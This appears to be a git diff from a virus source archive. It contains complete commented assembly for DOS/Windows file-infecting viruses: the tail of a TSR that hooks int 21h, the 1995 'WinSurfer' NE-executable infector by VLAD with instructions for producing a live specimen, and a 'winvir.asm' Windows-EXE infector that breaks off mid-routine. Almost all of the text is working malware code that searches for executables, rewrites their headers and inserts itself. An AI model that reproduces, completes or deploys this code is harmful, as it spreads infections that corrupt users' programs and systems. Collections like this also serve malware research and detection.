mov cx,[es:3]
sub [es:3],ax
mov bx,ax
mov ax,cs
add ax,[es:3]
sub ax,10h
mov [bseg],ax
cmp [byte es:0],'Z'
jz b10
push ds
mov ax,cs
add ax,cx
mov ds,ax
sub ax,bx
mov es,ax
sub ax,0fh
mov [cs:bseg],ax
xor si,si
mov di,si
mov cx,8
rep movsw
add [es:3],bx
sub [es:1],bx
pop ds
b10: mov ax,[bseg]
mov es,ax
mov si,100h
mov di,si
mov cx,offset endpr-100h
rep movsb
mov di,offset b03
xchg di,[0ah]
xchg ax,[0ch]
mov [es:oter],di
mov [es:oter+2],ax
ret
b03: push ax bx ds es cs
pop ds
mov ax,3521h
int 21h
mov [oi21],bx
mov [oi21s],es
mov ax,2521h
lea dx,[i21]
int 21h
pop es ds bx ax
db 0eah
endcod = $
oter dw 0
bseg dw ?
count dw ?
pauss db ?
fname db 13 dup (?)
dta dw ?,?
endpr = $
end

654
MSDOS/Virus.MSDOS.Unknown.winsurfr.a86 Normal file
View File

@ -0,0 +1,654 @@
;-------------------------------------------------------------------------
;
; WinSurfer Virus (c) 1995 VLAD incorporated.
; Written by qark and quantum.
;
; This virus is a parasitic TSR infector of NewEXE files. It works in
; protected mode only and infects on file execute.
;
; The executable infection code is by qark, while the interrupt handler
; code is by quantum.
;
; This virus contains no stealth of any form, a simple readonly attribute
; will stop the virus from writing, the time/date stamp is not preserved
; and there is no encryption of any form. Windows users are too dumb to
; notice anyway.
;
; To obtain a specimen of the virus, copy the compiled com file into the
; same directory as the file WINMINE.EXE and run it. Go into Windows
; and run the game 'Minesweeper'. Minesweeper should infect program
; manager direct action, so that next time windows is booted the virus
; will be resident.
;
; Possible Bugs and Improvements:
; 1) An error may be that if the file isn't exactly shift alignment sized
; the virus will overwrite some data at the end of the file or be
; incorrectly pointed.
; 2) An error may occur if the end of the segment table is less than eight
; bytes from a 512 byte divisor.
; 3) It may be possible to allocate buffer space without adding to virus
; size by changing the segment memory size in the segment table. At the
; moment the virus size is being doubled by the 512 byte read buffer we
; include in the disk image.
;
; Although the final virus was coded completely by quantum and I, many
; people helped by offering ideas, and windows documentation so I
; must give thanks to the following people:
; Screaming Radish, Stalker X, Dreadlord and some scandinavian dude.
; The most important help came from Malware who taught me the relocation
; entry ffff trick.
;
; Assemble with a86.
;-------------------------------------------------------------------------
;--Directly below is dropper code, ignore it, page down to the virus code--
mov ax,3d02h
mov dx,offset fname
int 21h
xchg bx,ax
mov ah,3fh
mov cx,512
mov dx,offset buffer
int 21h
mov si,offset buffer
cmp word ptr [si+3ch],400h
je ok_dropper
int 20h
ok_dropper:
mov ax,word ptr [si+2]
mov word ptr ppage,ax
mov ax,word ptr [si+4]
mov word ptr pfile,ax
mov ax,4200h
xor cx,cx
cwd
int 21h
mov ah,40h
mov cx,offset setsp - offset header
mov dx,offset header
int 21h
mov ax,4200h
xor cx,cx
mov dx,word ptr [si+3ch]
int 21h
mov ah,3fh
mov cx,512
mov dx,offset buffer
int 21h
mov ax,word ptr [si+1ch]
inc word ptr [si+1ch] ;increase segment count
mov cl,8
mul cl
mov di,word ptr [si+22h]
add di,si
add di,ax
mov ax,4202h
xor cx,cx
cwd
int 21h
;write in the new segment into the table
mov cl,byte ptr [si+32h]
push bx
mov bx,1
shl bx,cl
mov cx,bx
pop bx
div cx
mov word ptr [di],ax
mov word ptr [di+2],winend-win_entry
mov word ptr [di+4],180h
mov word ptr [di+6],winend-win_entry
mov ax,word ptr [si+14h]
mov word ptr winip2,ax
mov word ptr [si+14h],0
mov ax,word ptr [si+16h]
mov word ptr wincs2,ax
mov ax,word ptr [si+1ch] ;new cs:ip
mov word ptr [si+16h],ax
mov ah,40h
mov cx,winend-win_entry + 20h
mov dx,offset win_entry
int 21h
add word ptr [si+4],512
add word ptr [si+24h],512
add word ptr [si+26h],512
add word ptr [si+28h],512
add word ptr [si+2ah],512
mov dx,512
mov ax,4200h
xor cx,cx
int 21h
mov ah,40h
mov cx,512
mov dx,offset buffer
int 21h
mov ah,3eh
int 21h
int 20h
;--The New Windows DOS stub--
header db 'MZ'
ppage dw 0 ;part page
pfile dw 0 ;file/512
dw 0 ;relocation items
dw 10h ;header size/16
dw 0 ;minmem
dw -1 ;maxmem
dw 0 ;SS
dw offset setsp - offset winstart ;SP
dw 0 ;checksum
dw 0 ;IP
dw 0 ;CS
dw 40h ;Relocation offset
dupsize1 equ 3ch - ($-offset header)
db dupsize1 dup (0)
dw 200h ;NE offset
dupsize2 equ 100h - ($-offset header)
db dupsize2 dup (0)
winstart:
call windowsmsg
db 'This program requires Microsoft Windows.',0dh,0ah,'$'
windowsmsg:
pop dx
push cs
pop ds
mov ah,9
int 21h
mov ax,4c01h
int 21h
db 100 dup (0)
setsp:
;---end of fake dropper dos stub--
fname db 'winmine.exe',0
;----Start of the Virus---All the above is the dropper code, ignore it-------
win_entry: ;Infected windows executables start here.
jmp realenter
int21start: ;Virus Int21 handler
cmp ax,1894h ;Residency test ?
jnz nottest
mov cx,1234h
iret
nottest:
pusha
push ds
push es
cmp ah,4bh ;Windows is so dumb it uses DOS to
;execute.
jnz return2int
call executing
return2int:
pop es
pop ds
popa
db 0eah
oldint21 dw 0,0
executing:
mov ax,3d02h ;Open file in DS:DX
int 21h
jnc ok_open
ret
ok_open:
push ax
mov ax,0ah ;This function makes our CS writable.
push cs
pop bx
int 31h
push ax
pop ds
pop bx
mov ah,3fh ;Read first 512 bytes of EXE header.
mov cx,512
mov dx,offset buffer-offset win_entry
int 21h
mov si,offset buffer-offset win_entry
cmp word ptr [si],'ZM' ;Not a COM file.
jne bad_open
cmp word ptr [si+18h],40h ;40h+ for NE exe's
jb bad_open
cmp word ptr [si+3ch],400h ;header will be below if
je fileisoktoinfect ;already infected...
bad_open:
jmp fileisunsuitable
fileisoktoinfect:
sub word ptr [si+3ch],8 ;Change NE pointer.
sub word ptr [si+10h],8 ;Incase stack is end of header
mov ax,4200h ;Lseek right back to the start.
xor cx,cx
cwd
int 21h
mov ah,40h ;Rewrite the modified DOS header.
mov cx,512
mov dx,offset buffer - offset win_entry
int 21h
jc bad_open ;Write fail.. outta here!
mov ax,4200h ;Lseek to NE header.
xor cx,cx
mov dx,400h
int 21h
mov ah,3fh ;Read in first 512 bytes.
mov cx,512
mov dx,offset buffer - offset win_entry
int 21h
;Adjust header offsets. Any tables behind the segment table will
;have their offset increased by eight because we are inserting a new
;eight byte segment entry.
mov ax,word ptr [si+22h] ;AX=Segment table offset.
cmp word ptr [si+4],ax
jb ok_et
add word ptr [si+4],8
ok_et:
cmp word ptr [si+24h],ax
jb ok_rt
add word ptr [si+24h],8
ok_rt:
cmp word ptr [si+26h],ax
jb ok_rnt
add word ptr [si+26h],8
ok_rnt:
cmp word ptr [si+28h],ax
jb ok_mrt
add word ptr [si+28h],8
ok_mrt:
cmp word ptr [si+2ah],ax
jb ok_int
add word ptr [si+2ah],8
ok_int:
mov ax,word ptr [si+1ch]
inc word ptr [si+1ch] ;Increase segment count.
mov cl,8 ;Assume less than 256 segments.
mul cl
add ax,word ptr [si+22h] ;AX=Size of segment table.
xor dx,dx ;High order division value.
mov cx,512 ;512 byte portions are used
; for the reads later on.
div cx
mov word ptr [offset ne_size-offset win_entry],ax
;How much we'll have to read.
mov word ptr [offset last_ne-offset win_entry],dx
;Where the end of the segment table
; will be when we read it into the
; buffer. (The last buffer)
;Put the original CS:IP into our relocation table.
push word ptr [si+14h]
pop word ptr [offset newwinip2 - offset win_entry]
push word ptr [si+16h]
pop word ptr [offset newwincs2 - offset win_entry]
;Save the alignment shift count because we need that for calculating
;the offset of our segment when writing the segment entry.
push word ptr [si+32h]
pop word ptr [offset al_shift - offset win_entry]
;Point CS:IP to the virus.
mov word ptr [si+14h],0 ;The new IP
mov ax,word ptr [si+1ch]
mov word ptr [si+16h],ax ;The new CS
;Initialise the lseek variable
mov word ptr [offset lseek-offset win_entry],400h
;The below code gets the NE header and keeps moving it forward by
;eight bytes in 512 byte chunks.
move_header_forward:
mov ax,word ptr [offset ne_size-offset win_entry]
or ax,ax
jz last_page
dec word ptr [offset ne_size-offset win_entry]
mov ax,4200h ;Lseek to our current position.
xor cx,cx
mov dx,word ptr [offset lseek-offset win_entry]
sub dx,8
int 21h
mov ah,40h ;Write the header section out.
mov cx,512
mov dx,si
int 21h
;Advance the pointer by 512.
add word ptr [offset lseek-offset win_entry],512
mov ax,4200h ;Lseek to the next chunk.
xor cx,cx
mov dx,word ptr [offset lseek-offset win_entry]
int 21h
mov ah,3fh ;Read it.
mov dx,offset buffer - offset win_entry
mov cx,512
int 21h
jmp move_header_forward
last_page:
mov ax,4202h ;Lseek to end of file.
xor cx,cx
cwd
int 21h ;File length into DX:AX
;DX:AX=File offset of our segment
;Below section shifts the segment offset right by the alignment
;shift value.
mov cl,byte ptr [offset al_shift - offset win_entry]
push bx
mov bx,1
shl bx,cl
mov cx,bx
pop bx
div cx
mov di,si
add di,word ptr [offset last_ne-offset win_entry]
;Adding the new segment table entry
mov word ptr [di],ax ;Segment offset
mov word ptr [di+2],offset winend-offset win_entry
mov word ptr [di+4],180h ;Segment attribute
; 180h = NonMovable + Relocations
mov word ptr [di+6],offset winend-offset win_entry
mov ax,4200h ;Lseek to next position.
xor cx,cx
mov dx,word ptr [offset lseek-offset win_entry]
sub dx,8
int 21h
mov ah,40h ;Write rest of NE header + new seg entry.
mov cx,word ptr [offset last_ne-offset win_entry]
add cx,8 ;Added segment entry means eight more.
mov dx,offset buffer - offset win_entry
int 21h
;Reset the relocatable pointer.
push word ptr [offset winip - offset win_entry]
push word ptr [offset wincs - offset win_entry]
mov word ptr [offset winip - offset win_entry],0
mov word ptr [offset wincs - offset win_entry],0ffffh
mov ax,4202h ;Lseek to end of file.
xor cx,cx
cwd
int 21h
mov ah,40h ;Write main virus body.
mov cx,offset winend-offset win_entry
xor dx,dx
int 21h
pop word ptr [offset wincs - offset win_entry]
pop word ptr [offset winip - offset win_entry]
mov ah,40h ;Write the relocation item.
mov cx,offset winend-offset relocblk
mov dx,offset relocblk-offset win_entry
int 21h
fileisunsuitable:
mov ah,3eh ;Close file.
int 21h
ret
prefix db 'hell='
windir db 'indir='
systemfile db 'system.ini',0
NE_Size dw 0
Last_NE dw 0
Al_Shift dw 0
LSeek dw 0
progman db 0 ;1=Program Manager
envir dw 0 ;environment segment
pathbuff db 142 dup (0)
realenter:
pusha
push si
push di
push ds
push es
mov ax,1686h ;Is DPMI available ?
int 2fh
or ax,ax
jz dpmifound
no_dpmi:
jmp alreadyinmem
dpmifound:
mov ax,000ah ;Make CS writable.
push cs ;Protected mode isn't protected.
pop bx
int 31h ;Use DPMI.
push ax
pop ds
xor cx,cx ;Check if resident.
mov ax,1894h
int 21h
cmp cx,1234h ;Must be resident..
jz no_dpmi
cmp byte ptr [offset progman - offset win_entry],1
jne direct_progman
mov byte ptr [offset progman - offset win_entry],0
;Can't go TSR off any program but program manager.
mov ax,0204h ;Get real mode interrupt vector.
mov bl,21h
int 31h
mov ds:[offset oldint21 - win_entry],dx
mov ds:[offset oldint21 - win_entry + 2],cx
push cs
pop cx
mov dx,offset int21start-win_entry
mov ax,0205h
mov bl,21h
int 31h ;Set real mode interrupt vector.
jmp alreadyinmem
direct_progman:
;Next portion of code searches for the environment variable
;'windir' and places that before the files we access.
;On entry ES=PSP
mov ax,word ptr es:[2ch] ;PSP:[2ch]=Environment segment.
cld
mov es,ax
mov al,'w' ;w from windir
mov cx,-1
xor di,di
mov dx,di
dir_loop:
mov di,dx
repnz scasb
mov dx,di
mov si,offset windir-win_entry
push cx
mov cx,6
repe cmpsb ;indir from windir
pop cx
jne dir_loop
mov si,di
mov ax,ds
push es
pop ds
mov es,ax
mov cx,128
mov di,offset pathbuff-win_entry
rep movsb ;Move it into our path buffer.
push es
pop ds
mov di,offset pathbuff-win_entry
mov al,0
mov cx,128
repnz scasb
mov byte ptr es:[di-1],'\' ;Add a slash behind the path.
mov si,offset systemfile -offset win_entry
mov cx,11
rep movsb
;The below code reads in the 'system.ini' file and searches for
;the 'shell=' value, and infects the program specified by it.
;The windows shell (eg program manager) is always active in memory
;and we use it to go resident off.
mov ax,3d02h
mov dx,offset pathbuff -offset win_entry
int 21h
jc alreadyinmem
xchg bx,ax
mov ah,3fh
mov cx,512
mov dx,offset buffer -offset win_entry
int 21h
mov ah,3eh
int 21h
push ds
pop es
mov di,offset buffer-offset win_entry
mov dx,di
cld
mov cx,512
shell_loop:
mov di,dx
mov al,'s' ;The 's' in 'shell='
repne scasb
jne alreadyinmem
mov dx,di
mov si,offset prefix -offset win_entry ;Test for 'hell='
push cx
mov cx,5
repe cmpsb
pop cx
jne shell_loop
mov si,di ;Offset of filename into DX.
mov al,'.' ;The dot in the filename extension.
mov cl,0ffh
repne scasb
add di,3 ;Point to past the filename.
mov byte ptr es:[di],0 ;Add a zero to make it asciiz.
mov di,offset pathbuff-win_entry
mov al,0
mov cx,128
repnz scasb ;Search for the 0 at the path end.
dec di
mov al,'\' ;Now find the last backslash.
mov cx,128
std ;Scan backwards.
repnz scasb
cld
inc di ;DI points behind the final '\'
inc di
mov cx,15
rep movsb ;Append the shell program name.
mov dx,offset pathbuff-win_entry
mov byte ptr [offset progman - offset win_entry],1
call executing
mov byte ptr [offset progman - offset win_entry],0
alreadyinmem:
pop es
pop ds
pop di
pop si
popa
db 0eah ;JMP FAR PTR xxxx:xxxx
winip dw 0
wincs dw 0ffffh ;Needs to be FFFF due to windows
; relocation item format.
buffer db 512 dup (0)
;Below is the relocation item format. What ours does is turn the far jump
; above us into a jump to the original CS:IP.
relocblk dw 1 ;Signal only one relocation item.
db 3 ;32 bit pointer relocation.
db 4 ;Additive relocation (unsure, but
; it doesnt work unless you put this)
dw offset winip-offset win_entry ;Relocation offset.
newwincs2 dw 0 ;Target of the relocation. (We use
newwinip2 dw 0 ; the original host CS:IP)
winend: ;The actual virus ends here.
;-----End of the Virus---Below is dropper code-----------------------------
dw 1
db 3
db 4
dw offset winip - offset win_entry
wincs2 dw 0
winip2 dw 0

688
MSDOS/Virus.MSDOS.Unknown.winvir.asm Normal file
View File

@ -0,0 +1,688 @@
;A Basic Windows-EXE infecting virus. Launched as a DOS COM file.
.model small
.code
;All code must be offset-relocatable.
;All data is stored on the stack.
;Useful constants
NEW_HDR_SIZE EQU 40H ;size of new EXE header
;The following are used to access data on the stack. The first 512 bytes are
;a buffer for disk reads/writes.
FILE_ID EQU 200H ;"*.EXE" constant
ENTRYPT EQU 206H ;ip of virus start
VIRSTART EQU 208H ;offset of virus start in cs
NH_OFFSET EQU 20AH ;new EXE header offset from file start
VIRSECS EQU 20CH ;size added to file, in sectors for virus
INITSEC EQU 20EH ;initial cs location in file (sectors)
RELOCS EQU 210H ;number of relocatables in initial cs
LOG_SEC EQU 212H ;logical sector size for pgm
CS_SIZE EQU 214H ;size of all data in code seg, including rels, not virus
NEW_HDR EQU 216H ;new EXE header
;The following gives the size of the virus, in bytes
VIRUS_SIZE EQU OFFSET END_VIRUS - OFFSET VIRUS
ORG 100H
;******************************************************************************
;This is the main virus routine. It simply finds a file to infect and infects
;it, and then passes control to the host program. It resides in the first
;segment of the host program, that is, the segment where control is initially
;passed.
VIRUS:
push ax ;save all registers
push bx
push cx
push dx
push si
push di
call VIR_START
VIR_START:
pop bx
sub bx,3+6
push bp ;save segments and bp
push ds
push es
mov ax,ss ;all viral data is in stack segment
mov ds,ax
mov es,ax
sub sp,512+128 ;data area
mov bp,sp ;bp indexes data
mov [bp+VIRSTART],bx ;save virus starting offset here
call FIND_FILE ;find a viable file to infect
jnz GOTO_HOST ;z set if a file was found
call INFECT_FILE ;infect it if found
GOTO_HOST:
add sp,512+128
pop es
pop ds
pop bp
pop di
pop si
pop dx
pop cx
pop bx
pop ax
VIRUS_DONE:
jmp HOST ;pass control to host program
;******************************************************************************
;This routine searches for a file to infect. It looks for EXE files and then
;checks them to see if they're uninfected, infectable Windows files. If a file
;is found, this routine returns with Z set, with the file left open, and its
;handle in the bx register. This FIND_FILE searches only the current directory.
FIND_FILE:
mov di,bp ;first, put '*.EXE',0 on stack
add di,FILE_ID ;at this location
mov dx,di ;set dx up for search first
mov ax,2E2AH ;*.
stosw
mov ax,5845H ;EX
stosw
mov ax,0045H ;E(0)
stosw
xor cx,cx ;file attribute
mov ah,4EH ;search first
int 21H
FIND_LOOP:
or al,al ;see if search successful
jnz FIND_EXIT ;nope, exit with NZ set
call FILE_OK ;see if it is infectable
jz FIND_EXIT ;yes, get out with Z set
mov ah,4FH ;no, search for next file
int 21H
jmp SHORT FIND_LOOP
FIND_EXIT: ;pass control back to main routine
ret
;This routine determines whether a file is ok to infect. The conditions for an
;OK file are as follows:
;
; (1) It must be a Windows EXE file.
; (2) There must be enough room in the initial code segment for it.
; (3) The file must not be infected already.
;
;If the file is OK, this routine returns with Z set, the file open, and the
;handle in bx. If the file is not OK, this routine returns with NZ set, and
;it closes the file. This routine also sets up a number of important variables
;as it snoops through the file. These are used by the infect routine later.
FILE_OK:
push ds
push es ;save seg registers
mov ah,2FH
int 21H ;get current DTA address in es:bx
push es
push ds
pop es
pop ds ;exchange ds and es
mov dx,bx ;put address in ds:dx
add dx,30 ;set ds:dx to point to file name
mov ah,3DH ;ok, now open the file
mov al,01000010B ;flags, read/write, etc.
int 21H
pop es
pop ds ;restore seg registers
jnc FOK1 ;error on opening?
jmp FOK_ERROR2 ;yes, exit now
FOK1: mov bx,ax ;open ok, put handle in bx
mov ah,3FH ;now read EXE header
mov dx,bp ;ds:dx points to file buffer
mov cx,40H ;read 40H bytes
int 21H
jc FN1 ;exit on error
cmp [bp],5A4DH ;see if first 2 bytes are 'MZ'
jnz FN1 ;nope, file not an EXE, exit
cmp WORD PTR [bp+18H],40H ;see if reloc table is at 40H or more
jc FN1 ;nope, it can't be a Windows EXE
mov dx,[bp+3CH] ;ok, put offset to new header in dx
mov [bp+NH_OFFSET],dx ;and save it here
xor cx,cx
mov ax,4200H ;now do a seek from start
int 21H
jc FN1
mov ah,3FH
mov cx,NEW_HDR_SIZE ;now read the new header
mov dx,bp ;into memory
add dx,NEW_HDR
int 21H
jc FN1 ;exit if there is an error
cmp [bp+NEW_HDR],454EH ;see if this is 'NE' new header ID
jnz FN1 ;nope, not a Windows EXE!
mov al,[bp+36H+NEW_HDR] ;get target OS flags
and al,2 ;see if target OS = windows
jnz FOK2 ;ok, go on
FN1: jmp FOK_ERROR1 ;else exit
;If we get here, then condition (1) is fulfilled.
FOK2: mov dx,[bp+16H+NEW_HDR] ;get initial cs
call GET_SEG_ENTRY ;and read seg table entry into disk buf
jc FOK_ERROR1
mov ax,[bp+2] ;put segment length in ax
add ax,VIRUS_SIZE ;add size of virus to it
jc FOK_ERROR1 ;if we carry, there's not enough room
;else we're clear on this count
;If we get here, then condition (2) is fulfilled.
mov cx,[bp+NEW_HDR+32H] ;logical sector alignment
mov ax,1
shl ax,cl ;ax=logical sector size
mov cx,[bp] ;get logical-sector offset of start seg
mul cx ;byte offset in dx:ax
add ax,WORD PTR [bp+NEW_HDR+14H];add in ip of entry point
adc dx,0
mov cx,dx
mov dx,ax ;put entry point in cx:dx
mov ax,4200H ;and seek from start of file
int 21H
jc FOK_ERROR1
mov ah,3FH
mov cx,20H ;read 32 bytes
mov dx,bp
int 21H ;into buffer
jc FOK_ERROR1
mov di,bp
mov si,[bp+VIRSTART] ;get starting offset of virus in cs
mov cx,10H ;compare 32 bytes
FOK3: mov ax,cs:[si] ;of virus at cs
add si,2
add di,2
cmp ax,[di-2] ;with code in buffer
loopz FOK3
jz FOK_ERROR1 ;already there, exit not ok
;If we get here, then condition (3) is fulfilled, all systems go!
xor al,al ;set Z flag
ret ;and exit
FOK_ERROR1:
mov ah,3EH ;close file before exiting
int 21H
FOK_ERROR2:
mov al,1
or al,al ;set NZ
ret ;and return to caller
;******************************************************************************
;This routine modifies the file we found to put the virus in it. There are a
;number of steps in the infection process, as follows:
; 1) We have to modify the segment table. For the initial segment, this
; involves (a) increasing the segment size by the size of the virus,
; and (b) increase the minimum allocation size of the segment, if it
; needs it. Every segment AFTER this initial segment must also be
; adjusted by adding the size increase, in sectors, of the virus
; to it.
; 2) We have to change the starting ip in the new header. The virus is
; placed after the host code in this segment, so the new ip will be
; the old segment size.
; 3) We have to move all sectors in the file after the initial code segment
; out by VIRSECS, the size of the virus in sectors.
; 4) We have to move the relocatables, if any, at the end of the code
; segment we are infecting, to make room for the virus code
; 5) We must move the virus code into the code segment we are infecting.
; 6) We must adjust the jump in the virus to go to the original entry point.
; 7) We must adjust the resource offsets in the resource table to reflect
; their new locations.
; 8) We have to kill the fast-load area.
;
INFECT_FILE:
mov dx,[bp+NEW_HDR+24H] ;get resource table @
add dx,[bp+NH_OFFSET]
xor cx,cx
mov ax,4200H
int 21H
mov dx,bp
add dx,LOG_SEC ;read logical sector size
mov ah,3FH
mov cx,2
int 21H
mov cx,[bp+LOG_SEC]
mov ax,1
shl ax,cl
mov [bp+LOG_SEC],ax ;put logical sector size here
mov ax,[bp+NEW_HDR+14H] ;save old entry point
mov [bp+ENTRYPT],ax ;for future use
mov dx,[bp+NEW_HDR+16H] ;read seg table entry
call GET_SEG_ENTRY ;for initial cs
mov ax,[bp] ;get location of this seg in file
mov [bp+INITSEC],ax ;save that here
mov ax,[bp+2] ;get segment size
mov [bp+NEW_HDR+14H],ax ;update entry ip in new header in ram
call SET_RELOCS ;set up RELOCS and CS_SIZE
mov ax,VIRUS_SIZE ;now calculate added size of segment
add ax,[bp+CS_SIZE] ;ax=total new size
xor dx,dx
mov cx,[bp+LOG_SEC]
div cx ;ax=full sectors in cs with virus
or dx,dx ;any remainder?
jz INF05
inc ax ;adjust for partially full sector
INF05: push ax
mov ax,[bp+CS_SIZE] ;size without virus
xor dx,dx
div cx
or dx,dx
jz INF07
inc ax
INF07: pop cx
sub cx,ax ;cx=number of secs needed for virus
mov [bp+VIRSECS],cx ;save this here
call UPDATE_SEG_TBL ;perform mods in (1) above on file
mov ax,4200H ;now move file pointer to new header
mov dx,[bp+NH_OFFSET]
xor cx,cx
int 21H
lea di,[bp+NEW_HDR+37H] ;zero out fast load area
xor ax,ax
stosb
stosw
stosw ;(8) completed
mov ah,40H ;and update new header in file
mov dx,bp ;(we updated the entry point above)
add dx,NEW_HDR
mov cx,NEW_HDR_SIZE
int 21H ;mods in (2) above now complete
call MOVE_END_OUT ;move end of virus out by VIRSECS (3)
;also sets up RELOCS count
cmp WORD PTR [bp+RELOCS],0 ;any relocatables in cs?
jz INF1 ;nope, don't need to relocate them
call RELOCATE_RELOCS ;relocate relocatables in cs (4)
INF1: call WRITE_VIRUS_CODE ;put virus into cs (5 & 6)
call UPDATE_RES_TABLE ;update resource table entries
mov ah,3EH ;close the file now
int 21H ;all done infecting!
; mov ah,2FH ;report file name infected
; int 21H ;for DOS-based debugging purposes
; push es ;only!
; pop ds
; add bx,30
; mov dx,bx
;ZLP: mov al,[bx]
; or al,al
; jz ZLP1
; inc bx
; jmp ZLP
;ZLP1: mov BYTE PTR [bx],'$'
; mov ah,9
; int 21H
ret
;The following procedure updates the Segment Table entries per item (1) in
;INFECT_FILE.
UPDATE_SEG_TBL:
mov dx,[bp+NEW_HDR+16H] ;read seg table entry
call GET_SEG_ENTRY ;for initial cs
mov ax,[bp+2] ;get seg size
add ax,VIRUS_SIZE ;add the size of the virus to seg size
mov [bp+2],ax ;and update size in seg table
mov ax,[bp+6] ;get min allocation size of segment
or ax,ax ;is it 64K?
jz US2 ;yes, leave it alone
US1: add ax,VIRUS_SIZE ;add virus size on
jnc US2 ;no overflow, go and update
xor ax,ax ;else set size = 64K
US2: mov [bp+6],ax ;update size in table in ram
mov ax,4201H
mov cx,0FFFFH
mov dx,-8
int 21H ;back up to location of seg table entry
mov ah,40H ;and write modified seg table entry
mov dx,bp ;for initial cs to segment table
mov cx,8
int 21H ;ok, init cs seg table entry is modified
mov di,[bp+NEW_HDR+1CH] ;get number of segment table entries
US3: push di ;save table entry counter
mov dx,di ;dx=seg table entry # to read
call GET_SEG_ENTRY ;read it into disk buffer
mov ax,[bp] ;get offset of this segment in file
cmp ax,[bp+INITSEC] ;higher than initial code segment?
jle US4 ;nope, don't adjust
add ax,[bp+VIRSECS] ;yes, add the size of virus in
US4: mov [bp],ax ;adjust segment loc in memory
mov ax,4201H
mov cx,0FFFFH
mov dx,-8
int 21H ;back up to location of seg table entry
mov ah,40H ;and write modified seg table entry
mov dx,bp
mov cx,8
int 21H
pop di ;restore table entry counter
dec di
jnz US3 ;and loop until all segments done
ret ;all done
;This routine goes to the segment table entry number specified in dx in the
;file and reads it into the disk buffer. dx=1 is the first entry!
GET_SEG_ENTRY:
mov ax,4200H ;seek in file
dec dx
mov cl,3
shl dx,cl
add dx,[bp+NH_OFFSET]
add dx,[bp+NEW_HDR+22H] ;dx=ofs of seg table entry requested
xor cx,cx ; in the file
int 21H ;go to specified table entry
jc GSE1 ;exit on error
mov ah,3FH ;read table entry into disk buf
mov dx,bp
mov cx,8
int 21H
GSE1: ret
;This routine moves the end of the virus out by VIRSECS. The "end" is
;everything after the initial code segment where the virus will live.
;The variable VIRSECS is assumed to be properly set up before this is called.
;This routine also sets up the RELOCS variable.
MOVE_END_OUT:
mov ax,[bp+CS_SIZE] ;size of cs in bytes
mov cx,[bp+LOG_SEC]
xor dx,dx
div cx
or dx,dx
jz ME01
inc ax
ME01: add ax,[bp+INITSEC] ;ax=next sector after cs
push ax
xor dx,dx
xor cx,cx
mov ax,4202H ;seek end of file
int 21H ;returns dx:ax = file size
mov cx,[bp+LOG_SEC]
div cx ;ax=sectors in file
mov si,ax ;keep it here
pop di ;last sector after code segment
dec di
MEO2: push si
push di
call MOVE_SECTOR ;move sector number si out
pop di
pop si
dec si
cmp si,di
jnz MEO2 ;and loop until all moved
ret
;This routine moves a single sector from SI to SI+VIRSECS
MOVE_SECTOR:
mov ax,si
mov cx,[bp+LOG_SEC]
mul cx
mov cx,dx
mov dx,ax
mov ax,4200H
int 21H ;seek sector si
mov ah,3FH ;and read it
mov dx,bp
mov cx,[bp+LOG_SEC]
int 21H
mov ax,[bp+VIRSECS]
dec ax ;calculate new, relative file ptr
mov cx,[bp+LOG_SEC]
mul cx
mov cx,dx
mov dx,ax
mov ax,4201H
int 21H ;and move there
mov ah,40H
mov dx,bp
mov cx,[bp+LOG_SEC]
int 21H ;and write sector there
ret
;This routine simply sets the variable RELOCS and CS_SIZE variables in memory.
SET_RELOCS:
mov WORD PTR [bp+RELOCS],0
mov dx,[bp+NEW_HDR+16H] ;read init cs seg table entry
call GET_SEG_ENTRY
mov ax,[bp+4] ;get segment flags
xor dx,dx
and ah,1 ;check for relocation data
mov ax,[bp+NEW_HDR+14H] ;size of segment is this
jz SRE ;no data, continue
push ax
push ax ;there is relocation data, how much?
mov ax,[bp+INITSEC] ;find end of code in file
mov cx,[bp+LOG_SEC]
mul cx ;dx:ax = start of cs in file
pop cx ;cx = size of code
add ax,cx
adc dx,0
mov cx,dx
mov dx,ax ;cx:dx=end of cs in file
mov ax,4200H ;so go seek it
int 21H
mov ah,3FH ;and read 2 byte count of relocatables
mov dx,bp
mov cx,2
int 21H
mov ax,[bp]
mov [bp+RELOCS],ax ;save count here
mov cl,3
shl ax,cl
add ax,2 ;size of relocation data
pop cx ;size of code in segment
xor dx,dx
add ax,cx ;total size of segment
adc dx,0
SRE: mov [bp+CS_SIZE],ax ;save it here
ret
;This routine relocates the relocatables at the end of the initial code
;segment to make room for the virus. It will move any number of relocation
;records, each of which is 8 bytes long.
RELOCATE_RELOCS:
mov ax,[bp+RELOCS] ;number of relocatables
mov cl,3
shl ax,cl
add ax,2 ;ax=total number of bytes to move
push ax
mov ax,[bp+INITSEC]
mov cx,[bp+LOG_SEC]
mul cx ;dx:ax = start of cs in file
add ax,[bp+NEW_HDR+14H]
adc dx,0 ;dx:ax = end of cs in file
pop cx ;cx = size of relocatables
add ax,cx
adc dx,0 ;dx:ax = end of code+relocatables
xchg ax,cx
xchg dx,cx ;ax=size cx:dx=location
RR_LP: push cx
push dx
push ax
cmp ax,512
jle RR1
mov ax,512 ;read up to 512 bytes
RR1: sub dx,ax ;back up file pointer
sbb cx,0
push cx
push dx
push ax
mov ax,4200H ;seek desired location in file
int 21H
pop cx
mov ah,3FH
mov dx,bp
int 21H ;read needed number of bytes, # in ax
pop dx
pop cx
push ax ;save # of bytes read
add dx,VIRUS_SIZE ;move file pointer up now
adc cx,0
mov ax,4200H
int 21H
pop cx ;bytes to write
mov ah,40H
mov dx,bp
int 21H ;write them to new location
pop ax
pop dx
pop cx
cmp ax,512 ;less than 512 bytes to write?
jle RRE ;yes, we're all done
sub ax,512 ;nope, adjust indicies
sub dx,512
sbb cx,0
jmp RR_LP ;and go do another
RRE: ret
;This routine writes the virus code itself into the code segment being infected.
;It also updates the jump which exits the virus so that it points to the old
;entry point in this segment. The only trick is that we can't write directly
;from cs since we can't just set ds=cs in windows or you get a fault. Thus
;we move the virus to the disk buffer and then write from there.
WRITE_VIRUS_CODE:
mov ax,[bp+INITSEC] ;sectors to code segment
mov cx,[bp+LOG_SEC]
mul cx ;dx:ax = location of code seg
add ax,[bp+NEW_HDR+14H]
adc dx,0 ;dx:ax = place to put virus
mov cx,dx
mov dx,ax
push cx
push dx ;save these to adjust jump
mov ax,4200H ;seek there
int 21H
mov si,[bp+VIRSTART] ;si=start of virus
mov cx,VIRUS_SIZE ;cx=size of virus
WVCLP: push cx
cmp cx,512 ;512 bytes maximum allowed per write
jle WVC1
mov cx,512
WVC1: push cx
mov di,bp ;now move virus to disk buffer
WCV2: mov al,cs:[si] ;get a byte from cs
inc si
stosb ;and save to disk buffer
loop WCV2 ;repeat until done
pop cx ;now write cx bytes to the file
